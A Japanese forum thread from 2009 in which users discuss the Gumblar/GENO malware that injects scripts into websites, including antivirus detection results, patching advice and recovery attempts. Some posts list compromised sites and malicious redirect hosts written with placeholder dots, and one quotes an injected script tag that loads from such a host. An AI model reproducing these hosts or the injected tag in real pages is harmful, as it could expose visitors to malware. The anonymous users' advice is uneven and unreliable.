他も拾うようになったのかな

>>455
FTP使って改ざんされてます
サーバに攻撃とかそういうのじゃないです
つーかこのへんは前と変わってないはず

>>456
同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ
今はAvast!とKasperskyの対応がよさそう

2/41 (4.88%)
ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050
5/41 (12.20%)
ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598

何となく思ったのだが

何気に Vista、Windows7 への移行を促そうとする
大人の事情が暗に蠢いていたりとかするのだろうか…

7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ

>>458
日ごとどころかアクセスするたびにかわるわよ
でも非IEでもAvastが対応してきたようだね

XPの脆さが改めて露呈しただけだろ

Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり
居るってことだな
MSE普及の一環か

カスペでさっき遮断した
本当に困る

>>463
MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ

>>463
Flash Playerだけじゃないよ

http://genolists.alink.uic.to/
新種感染サイトのリストはここ使うの？

>>450
Google先生は、AS番号ごとにウイルス感染サイト（gumbler以外も含む）を教えてくれるよ。

例えば、
楽天（infoseek.co.jp、cool.ne.jp）
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23820
Softbank（geocities.jp）
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:23816
とかね。

最近までgumblar/martuzに改竄されて放置されてたサイトは、
新型に改竄されてる可能性が高い。

http://fileseek.jp/（携帯専用）
PCサイト閲覧Proxyのメニュー(*ボタン)からソースを見れるから
簡易チェッカーとして使えるかもしれん。
※パケ定必須

>>465
ノートンは脆弱性を遮断する機能で防げるんじゃないだろうか

バスター最新にしても駄目？

>>471
それよりもAdobeのアップデートとWindowsアップデートしとけば問題ない

>>470
分かる範囲でいくつかのサイトに行ったがすべてその機能で遮断できる

アップデート全部したんだが、これで再起動しても平気かな？

ソフトの更新は予防のためにするものであって
感染後にやっても手遅れだよ

／(^o^)＼

>>474
カスペのオンラインスキャンでウイルススキャンしてからのほうがいいよ

>>468 その2つのページだけで、日本国内のgumblar.x感染サイトが9つある。

ikebananonohana●hp●infoseek●co●jp
pengzipk●hp●infoseek●co●jp
seiya06●hp●infoseek●co●jp
pee3●hp●infoseek●co●jp
www●ski-srsc●com
www●geocities●jp／fumisugi43／
www●geocities●jp／jr1ujx／
www●geocities●jp／tileaf05／
www●jpla-aichi●com

こりゃ、国内60サイトどころじゃないでしょ。

>>477
現在メンテナンス中のため、ご利用いただけません。ご迷惑をおかけして申し訳ございません。
機能を強化した新しいバージョンのカスペルスキーオンラインスキャナが近日中にリリースされます。
また、個人向け総合セキュリティソフト「Kaspersky Internet Security 2010」の無料試用版 (有効期間:30日間) をダウンロードしてご利用いただけます。

ニフティもエンジンはカスペだからそっちでやればいいんじゃね

>>474
ちなみに全部ってのは本当に全部やったの？
たとえばFlash PlayerはIEとそれ以外じゃ別のものだよ

さらに色々調べたが
ノートンはファイルの検査では検出しないけど
ブラウザで読み込むと検出する
サイトアドレスではなくファイルで検出するようだ

この後バスター入れて試してみる

バスター入れてみたが試した範囲ではすべて遮断される
ただデスクトップにおいたphpファイルは読み込める
２度目以降は無効になるような場合でも遮断される
サイトアドレスで遮断してるように思えるがよく分からない

>>483
調査乙

>>483
激乙です！
てことは大抵のアンチウイルスソフト入れてる人は
感染したサイト見ても、とりあえず感染は防げてるってことなのかな
マカフィーはどうだろう

>>485みたいのが一番危ないタイプだな

>>485
その前に試したPandaは読み込めちゃったね
違う段階で遮断できるかも知れないけど

>>486
アンチウイルスソフトやウインドウズアップデートは最新にしてたんだけど、
adobeは最新の一つ手前くらいのままだったからやっぱり感染したかな…

>>487
そっかー
即レスありがとう

>>488
心配ならOSいれなおし

データのバックアップしても、入れ直したパソにそのデータ入れたら、再感染だよね？
このウイルスはそんなことないとかないかorz

>>488
セコムに入っているから大丈夫！と鍵をかけずに外出したようなものだね
モノに頼ってそれに過信してしまって
一番肝心なところである
それを使う人間がセキュリティへの認識を忘れてしまっては
どんなに優れたモノを使っていても意味をなさないよ

アップデートは最低でもこれくらいやらないとな

Windows Update / Microsoft Update
Adobe Flash Player 10.0.32.18 (IEと非IE両方)
Adobe Reader 9.2 (導入済ならアップデート。ReaderのJavaScriptは切る)

上記は現段階の新型Daonol/Gumblarには必須
亜種でどうなるか分からないので下記も実施

Adobe Shockwave Player 11.5.1.601 (導入済ならIEと非IE両方。正直アンインストールでいい)
Java 6 Update 16 (旧バージョンはすべてアンインストール)

あとはQuickTimeとRealPlayerあたりか
使わないものはアンインストールだな

>>490
確実に大丈夫とはいえない

今回Adobeのいつ頃のき弱性をついたものなのかもう分かってるの？

もうFlashなんかやめてSilverlightを採用すればいいのに

Windows Updateぐらい自動更新の設定にしとこうよ
というかMSがWindows Updateの対象にAdobe ReaderとFlash入れるだけでいいのに

「ぜいじゃく」って読むんだよ、ぼうや

きじゃくてｗｗｗ
言語弱者もいいとこｗｗｗ

釣られんなよｗ

後釣り宣言ｶｺﾜﾙｲ

生酒でも飲んでまったりやろうや

この時間から酒飲むと朝つらいからお断りします

>>494
特定の脆弱性だけじゃなく複数利用してる
Adobe製品だけじゃなくMicrosoftのもあった
いろいろな組み合わせみたいなんで確実にこれだけふさげばいいってものはないよ

【中卒の為の国語辞典】

脆弱性 【ぜいじゃくせい】

脆【もろ】く、傷つきやすいこと。攻撃に対して弱いこと。

前のGENOの時はメールとかお気に入りとか、そういうファイルデータにつく
ウイルスじゃないから、感染してからバックアップとっても
平気とかどこかで見た気がする。
もちろんデータをクリーンインストールしてから戻すときは
当然ウイルスチェックしてからということだったけど。

ぜいじゃく性ですね
すみません
本当に恥ずかしい間違いでした
教えてくれてありがとうございます

本当の読み方はぜいじゃくしょう
ただ、最初に用語辞典に載った時にぜいじゃくせいとルビを振られたから今の読みになった
豆知識

>>507
恥ずかしい限りですが勉強になります

やっぱりアップデートとかをこまめにするのが一番ですが
今回のは駆除はカスペができるようなので、カスペで無事検出駆除できた人は
OS再インスコしなくて良さそう？なのかな？

カスペで駆除できたって報告あるか？

ありますんね・・・

カスペ自らが宣言してるけどどこまで対応してるのかわからん
http://www.kaspersky.co.jp/news?id=207578788

試しに感染してみるか
古いアドビのソフトがあれば

無駄無駄
アンチウィルスソフトに過剰な期待を抱かないほうがいい
日々、腐るほど亜種が湧いてるからな

そのうちvistaや7も感染対象になるのかね

カスペもオンラインスキャナをメンテ中とか鬼だよな。

Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
http://www.forest.impress.co.jp/docs/review/20091020_323014.html
http://hide9999.web.fc2.com/

既出
もともと自動

無料駆除ツールでてますか？
カスペ体験版入れるしかないのか・・・

体験版じゃなくて製品版買えばいいだろ

HD買ってきてOSインストールして
外したHDを外付けにしてバスター2010でウイルススキャン
トロイ式なんとかかんとか と出て隔離に成功

なんでも最新がいいんだなと思って IEは6から8へ
バスターも06から10へ

正直新しいPC買ったみたいです(^O^)

>>420
富士通よりシェアがデカいNEC(1位NEC 2位富士通)も当然パンク、
富士通にならってリリース出しました。

【お詫び】電話お問い合わせ窓口の混雑について
ttp://121ware.com/navigate/support/121cc/info/20091026/

東芝
ttp://dynabook.com/assistpc/info/20091022.htm
SONY
ttp://search.vaio.sony.co.jp/solution/S0910211068384/
DELL
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022

>>521
一昨日だっけか？東芝のサポートって類似の質問はないとか言って蹴ってなかったか？

>>508
前回のも普通に駆除できるから
無知が作ったウィキなんて信用するなよ

SonyはVistaも対象に含めているのか

なんだろこれ・・・

www■idealgroup-24■com/
→　theflyingpoodles■com/images/DSC_0035■php
→　chezmichel■nl/images/index3■php
→　bellsworld■com/new_submissions/verhor1■php
→　psunrise■cn/images-d/index2■php　(アクセス拒否)

最後のアクセス拒否以外の中身が妙な404で　AguseGatewayで見ると//404
ソース見るといずれも　// iframes are EVIL! Hate Zeus! 　というメッセージ付き

なんで

途中送信orz

なんでabout:blank開いてんだこれ
本当に404なら分かるけど

>>524
でもソニーはウイルス名の指定がないな。
とにかくリカバリしやがれ（意訳）の一点張り。あんまりあてにできないのでは。

Zeusっつーとこれかな
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091007/338476/

Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2045
25日時点でカスペルスキーが「Trojan-Downloader.JS.Gumblar.x」の検出名で全件を、
Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
G Dataが「JS:Downloader-EZ」で13件を検出した。
ちなみに前日に行った3件の事前調査では、カスペルスキー以外は全滅だった。

http://japan.internet.com/webtech/20091010/12.html
>Adobe の勧告には、次のような記述がある。
>「『Windows Vista』上で DEP (データ実行防止) 機能を有効化している
>Adobe Reader および Acrobat 9.1.3 のユーザーは、この攻撃の影響を受けない。

10/13のAcrobatの脆弱性ですが
VISTAでもDEPが無効だと駄目だったようですね。
VISTAがプレインストールされているPCだと
CPUがDEPにまず対応している気がしますが･･･

XPでハードウェアDEPが有効かつ
IE8のメモリ保護が有効だった場合はどうなんでしょうね･･･
VISTAと同様の結果になるのか、違うのか･･･

ソフト使わなくても、FlashPlayerとAdobeReaderを自動でアップデートできるって
上のほうで言われてるから調べてみた。
■FlashPlayer
http://www.adobe.com/jp/support/kb/ts/228/ts_228473_ja-jp.html
■AdobeReader（9.20は編集＞環境設定＞アップデーターでできた）
http://www.geocities.jp/fssreport/update/article003/index.html

＞Flash Player の自動更新のチェックはバックグラウンドでの動作ではなく、
＞ブラウザ上で Flash コンテンツを読み込んで Flash Player が起動した際に実行されます。

FlashPlayerだけでなく、AdobeReaderも同じだと思うんだけど、起動した際にアップデートって、
ウィルスつきのファイルを開く直前に最新版になれるって解釈していいんだろうか。

Flash_Reader_Updateはアップデート作業を「半自動化できる」ソフト

自動でアップデートするものでは無いから大差ない

>>533
いつも主導で更新しちゃってるから自動のチェックタイミングわからないんだけど
アプリ起動時のチェックだとしたら最新版になる前に攻撃くらうだろうね

主導→手動でしたごめん

Adobe ReaderとAdobe Flash Playerはいつアップデートあるのかわからない
アップデートは手動、Adobeのサイト言ってチェックしないといけない

過去の更新状況から考えると
更新があった場合はコンテンツが表示されたあとで
更新のダイアログが表示されていたはずだから
>>533の場合は既に攻撃を喰らったあとだろう

レスくれたひとありがとう。

Flash_Reader_Updateは半自動化しかしてくれなくても、
インターネット前に必ずアップデートするとか、
>>387の記事のように、タスクスケジューラ使うようにすれば、
>>533みたく『起動してから』じゃなくて、『事前に』最新版にできるんだよね。
ソフトDLすることにするわ。
記事みて検索してはじめて、タスクスケジューラを知った初心者だけどｗ

すまん感染の疑いのある者なんだがご教授願いたい
当方win機（一昨日買ったばかりwin7）とMac（OSX10.4）を使っている。
これらを使ってxoopsを使ったサイトを立ち上げようとした。
xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。
しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。
このエラーをｸﾞｸﾞったらGENOウイルスの仕業らしい、と。

自分的には可能性として
1.win機が感染している
2.Mac機が感染、もしくは保菌者（？）になっている
3.レンタルサーバーの業者自体が感染している

なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態
Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態

現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。

>>540
前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、
そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、
上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか
確実にわかるんじゃないかな

今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、
むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った
ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが

>>541
ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。
Macのほうはメインマシンだから1日かかりそう＞＜
とりあえず明日鯖業者にも連絡取ってみる＋カスペたんの導入を考えてみる

Avast!がPDFの検出をするようになった
SWFは未確認

もうすぐnortonの期限が切れそうでどれにしようか迷っている
ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・
カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象

スレ違いっぽいが
GENOの話ならノートンは対応してるぞ

新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい
flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう

一口にGENO（新旧gamblar）と言っても、いくつものファイルが関係するから
ウイルス対策ソフトがどの段階で検知するかはマチマチ
全部スルーして、穴があるシステムはやられる

MSの脆弱だけじゃないからね。
Adobeの脆弱性はノートンはやってくれないし。

>>548
やってくれないとは？
間違いだと思うが

嘘ばっかり言いやがるからな
２ｃｈだし適当に

>>530
http://www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880

> Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
> G Dataが「JS:Downloader-EZ」で13件を検出した。

G DataのEZって…

>>546
ベストかもしれないが、現実的には�_
うちの事務所は、みんなXPだし
とりあえず、うｐだて最新にしとくことか…

そういえばアドビやSunJavaのブラッドハウンドは見たことないね

>>546
個人なら切り替えはまだ容易だろうが
企業、特に中小企業だと業務用のPC全てを
XPから切り替えるのは容易ではない

このスレを覗きに来るような人たちには釈迦に説法だろうけど、
パッチ管理は多少面倒でももっとも効果的な対策
個人利用は無料のSecunia PSIで定期的なチェックをお勧め

Secunia Personal Software Inspector（PSI）ダウンロードページ
ttp://secunia.com/vulnerability_scanning/personal/
日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも

>>548-550
>>553

> 嘘ばっかり言いやがるからな
> ２ｃｈだし適当に

ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp
こちらを自分の目でご覧になりました？

>>556
何を言いたいんだ？
書いてあるねってことかな

今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は
カスペやAvastやノートン？でスキャンすれば検出や駆除が
きちんとできると思っていいのかな？
それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。
またすぐに違う亜種がでたらそれは別だろうけど。

>>539
タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。
新バージョンで「Quietモード」が追加されてる。
http://hide9999.web.fc2.com/

Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到
ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047

感染したＨＤドライブをスキャン中。
ノートンひっかかってくれるかな。。。

未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。

くるくるたああああああああああああああああいむ

すでに１０万ファイル調べてるのにひっかからん

くるくるたああああああああああああいむ

Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが
こういった一時的な利用なら
カスペルとAVASTの両方の検索エンジンを搭載した
G-DATAでスキャンしてみるのも良いかもしれない

>>561
ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか？

今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね

だから良くなったんだろ

www●george-ohtsuka●com
これはGENOですか？別のウイルス？

>>569
流行のGENO踏み台型感染（Web改ざん）タイプ、サイト管理人のPCも感染してる

</head>と<body>の間にscriptを1行仕込まれている
script src=●●●●//psunrise●cn/images-d/index2●php

>>569
あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい
どうしてオランダ？

>>569
新型GENO（gumblar.x）と、iframeインジェクションの両方に改竄されてるね。

ちなみに>>525の報告のように、
gumblar一派とiframeインジェクション一派は抗争中らしいw
ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27
ttp://ilion.blog47.fc2.com/blog-entry-155.html

ショバ（botに引き込む無防備なPC）を取り合ってるのだろうか。

感染したＨＤＤ、定義済みノートンで検知せず。
カスペでスキャン中。
やっぱりリカバリしかないのかな。
どっちにしろレジストリいじらなきゃだめか。

>>573
リカバリしてもレジストリいじらなきゃだめなの？

リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。

>>573
どうして感染したと分かるの？

起動時に黒い画面？
黒い画面だと、どうやってPCを起動させて、スキャンしてるの？

IQが低いとそんな書き込みしかできない

PCが、いちだ〜い、にだ〜い、…
ヒュ〜、どろどろどろ…

>>575
ドライブがリカバリディスクを認識するものの
数時間まっても始まらないから、そこらへんもやられちゃってると思う。

調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。

一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。
スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。

とりあえず１症例として書いてみました。

それは別のもんに感染してるんじゃないの
あとCDもしくはDVDドライブからの起動にしてる？

カスペのスキャン後に復活したみたいです。
ありがたいことにレジストリまで修正してくれるみたいだ。
駆除リストから詳細を調べたいが、
カスペがウィルスリストをぜんぜん登録してくれてない。。。

不具合としては、ユーザープロファイルが読み込めなる様子。
アカウント移行すれば問題ないです。

>>580
今回のでビンゴだったみたいです、
カスペの公式サイトのウイルス名と違ったもので。
ありがとうございます。

検出名隠蔽してたら誰もわからんわな

これはGENOウイルスでしょうか？

症状：
Vistaにて
起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
セーフモードだと起動。
regeditとcmdは起動。
sqlsodbc.chmも存在。ファイルサイズは通常通り。

どうでしょうか？

１．感染したマシンからＨＤＤ抜く
２．ＨＤＤケースに入れる
３．感染していないＰＣにカスペたん入れる
４．感染しているＨＤＤを外付けで３．のマシンに接続
５．スキャン

で駆除できるのかな？

人柱も嫌だし感染マシンが無いので検証してないけど

>>583
>起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
この症状はもろにそんなかんじだね

>>583
UAC切ってたのか？

>>583
いえ、ONにしてました。
悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。

利用してる脆弱性はAdobeだけじゃないんでなんとも
まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね

構造的には現状ではUACはスルーできんはずだが？
特にvistaのUACは7のデフォルト設定より粘着質
勢いで許可したかupdateのフェイクにでも引っかかったか

>>583
カスペルのオンラインスキャナーではどうなりました？

>>583
それGENOじゃあないだろ
Daonolだと思うんだが？

Daonolはvistaは対象外で手口もGENOとそう変わらない

じゃあなんなんだ
別のウイルスかハードの寿命か

パソコンのことはよく知らずにいたのが
わるかったんだけどなんかうちのサイト、感染したっぽい。

avast!が反応するようになっちゃった。
ファイル名　ttp://hd-select●com/blog/mail/mail_test.php
マルウェア名　JS:Redirector-H7 [Trj]

って出るんです。
ファイル名のサイト、バイクの通販かなんかだがこんなサイト
いったことないのになあ。

感染確認の類は全部やって異常は見られなかったけど
悲しいかな、サイトは削除しました。

典型的なGENOですね
バイクの通販サイトは・・・多分、あそこかなｗ

質問させてください
OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓
http://fancyrat●ru/cgi-bin/pomet2008●php

とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。

要求されたURLのWebページを表示できません
URL:
http://fancyrat.ru/cgi-bin/pomet2008.php
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x

aaa
miss
url変えてなかった。
開かんでおくれ。

>>594
関係ないサイトのコードが注入されるのが典型的なパターン
サイトは削除だけじゃなくそのサイト自体が無効にならないと
そのままのっとられる可能性があるので注意してください

感染確認というのが旧型Genoの確認方法だとしたら意味がないので
カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください

>>596
はい
新型のほうのGenoです
スキャンは他のメーカーのでもしてみてね

レス下さった方ありがとうございます、新型なんですね……
バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。

最新の定義ならブロックしてくれてる可能性もあるが
まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう

firefox用のpdfプラグインは9.1.0.163が最新？
readerは9.2だけどこれでいいのかな

今更だけどなんでこうなったという感じだな
去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった
一体、Gumblarの作者は何を考えて作ったんだろうか
vistaだけど巡回しまくるから油断はできないな

>>597
情報収集をするためにこのスレをロムっていたが
ミスって踏んでしまった…

>>605
大丈夫？

>>606
まとめの感染確認方法で調べてみましたが
一応、セーフでした、お騒がせして申し訳ありません。

それは意味ないと何度言えば

vista/7ならおそらくセーフ
XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも
新型が未知のセキュリティホールを突いていたらの話だけど

GENOに限った話ではないのですが、
ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に
的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか？

>>610
メールで教えるのは考え直した方がいいかと

>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど＾＾；とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ

>>597
こういう判定ってどこでできるの？

aguseで確認すればいいだろ。

過信は禁物だけどな

調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。

http://www.ipa.go.jp/security/todoke/
ここへ届け出たら、サイト管理者（orサーバ管理者）へ連絡してもらえたのだろうか・・

>>616
報告したならもうそれでいいだろ
＞ここへ届け出たら、サイト管理者（orサーバ管理者）へ連絡してもらえたのだろうか・・
ってわざわざうｒｌ貼られても困るしここで聞くことじゃない

>>617
それは大変失礼しました。

>>616
どちらでも何らかの対処はされると思います
レンタルサーバ側に直接連絡してもたいていは対応してくれるはず
数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな

ずいぶん情報集まってきたな
http://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/

すみません、情報下さい。
クレクレなのは承知です

デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
復帰する時にgenoウイルスに感染した様です。
起動すると真っ黒な画面にマウスポインタがポツリ。
セーフモードでも同様。
とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。
しかし、エラー多発で起動せず。
前回は動作したのでメディアの問題ではないかと。

で、富士通のサポートHPによると回復できる様ですが、
その際データが消去されないか心配です。
その点については触れられていなかったので・・・
ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
この場合、データは消去されてしまいますか？

本当に困っています。
釣りではありません。
どうか教えて下さい。

>>621
> デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
> 復帰する時にgenoウイルスに感染した様です。
このとき感染したんじゃなくてその前から
感染してて復帰タイミングで発病したってだけでしょ

ubuntuの前回使用はいつなの？
メディアの問題じゃないってなんで断言できるの？

コマンドプロンプトからの復帰もしくはリカバリと
https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1

コマンドプロンプトの操作だけで復帰できればおそらく問題なし
リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう
マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません

> ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
これは何が言いたいのかわかりません。

> 本当に困っています。
だから何？
本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。

>>622
私の書き込みによって不快にさせてしまいましたか？
もしそうであれば申し訳ありません。

データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。
それでもダメでしたら、素直にメーカーに修理にだします。
ありがとうございました。

スレ汚しすみませんでした。

管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに
そのサイトが感染してた期間中頻繁にアクセスしてたので、
今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、
黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、
むしろなぜ感染しなかったのか不思議です。

OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、
AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、
最新のひとつかふたつ前ぐらいのバージョンの状態でした。
Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、
それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか？
前回のGENOみたいに、感染したらファイルのサイズが変わるとか
確認できる方法があれば、まだ分かりやすいのにな。

>>624
最新のひとつかふたつ前だったからOKだったんだなきっと

>>625
やはりそう思われますか？
過信はもちろん禁物ですが、今回の新型に限っては
カスペルが感染してたら検出できるようですし
やっぱりギリギリセーフだったのかな？
ということは今回の新型は、最新のひとつかふたつ前より更に前の
脆弱性を狙ったものだったということになるのかもしれませんね。
もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。

いろんなサイトを巡回する人は特に注意
OSとAdobeのアップデート
XPでもFirefox＋NoScriptでだいたいは防げる

お客様のPCが起動不能に
どうやらDaonolのようでした

>>624
挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない
被害サイトアクセスした時期によるかも

脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで
更新してなきゃくらってたはず

ついでにこれを機にSP3まであてて最新のパッチを当ててね

>>629
無効化されたあとではなかったみたい。
そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、
感染そのままの状態だったようで、その間何度も見にいってたから、
最新にはしてなかったから絶対に感染したと思ってました。

>>631
そのサイトがどこかわからんけど無効化されていたかどうか
実際に見てないならわからないよ
サイト管理者が確認したのは自分のサイトの改変だけじゃないの

実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト
自分のサイトは改変されてても挿入元がすでに消去もしくは
コード改変による無効化が行われていたとしたら閲覧したPCに被害は
ないかもしれないってだけだよ

>>632
なるほど！スクリプトなどを書かれてソースコード改変イコール確実に感染
かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、
挿入元がすでに消去とかされてる場合もあるのですね。
FTPにもかなり何度もアタックがありパスも書き換えられて
盗み見されたようでいたちごっこのようだったとも書かれていたので、
その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、
そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、
分かりやすく何度も教えて下さって本当にありがとうございます。
検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。
でもこれからはもっとupdateとか気をつけなければ。
本当にレスありがとうございました。何度もうざい連投すみません。

何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ
ブラウザが古いキャッシュでも見てたのかな

コード改変による無効化って、感染→スクリプト挿入などのコード改変
→更に自動的に無効化？
うーん？

今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな？
スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
更に最終的に立ち上がらないようにまでしてしまうということなのかね
仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
そこで終わってセーフてことか

挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく
それを適当に無効化っていっちゃってるかんじですはい

なんつーかよくわからないまま混乱しちゃってるんじゃないかな
めんどいんで引用で

> 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
> そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな？
なんかちょっと違う気もするけどなんとなくはい

> スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
これはいいえ
脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く
攻撃が失敗か成功かってだけ

> 更に最終的に立ち上がらないようにまでしてしまうということなのかね
これは向こうのミスでそうなってしまったらしい
情報搾取が目的だから起動不能になるのは失敗なはず
ならないパターンもあるかもしれないしないかもしれない

> 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
> そこで終わってセーフてことか
まあはい
そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない

一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを
きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです

あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ
今はXPがたまたま脆弱性を突かれただけで
当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから
ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう
自覚を忘れないことが大切だと思うよ

それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか
反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか
丁寧にサンクス！

>>634
何度もその感染してた期間に閲覧してたみたいだから
古いキャッシュでも見てたというのはさすがにないんじゃないか？
それとも攻撃側がってことか？

だよなー
なんだろうなあ
カスペのスキャンが実は古かったとかないよね

今のところ突かれている脆弱性は既知のものだけなのは幸いだな。
攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。

偶然発見しちゃうときもあるから大丈夫ともいえないけどね

>>639
カスペは試用版ですが、データはもちろん最新にしてスキャンしました。
foxとノースクリプトを使っていたので大丈夫だったのかな？
とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。
やっぱり安心せずにリカバリするべきなのかな…。

今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には
gumblarで検知されて駆除されるんだよね
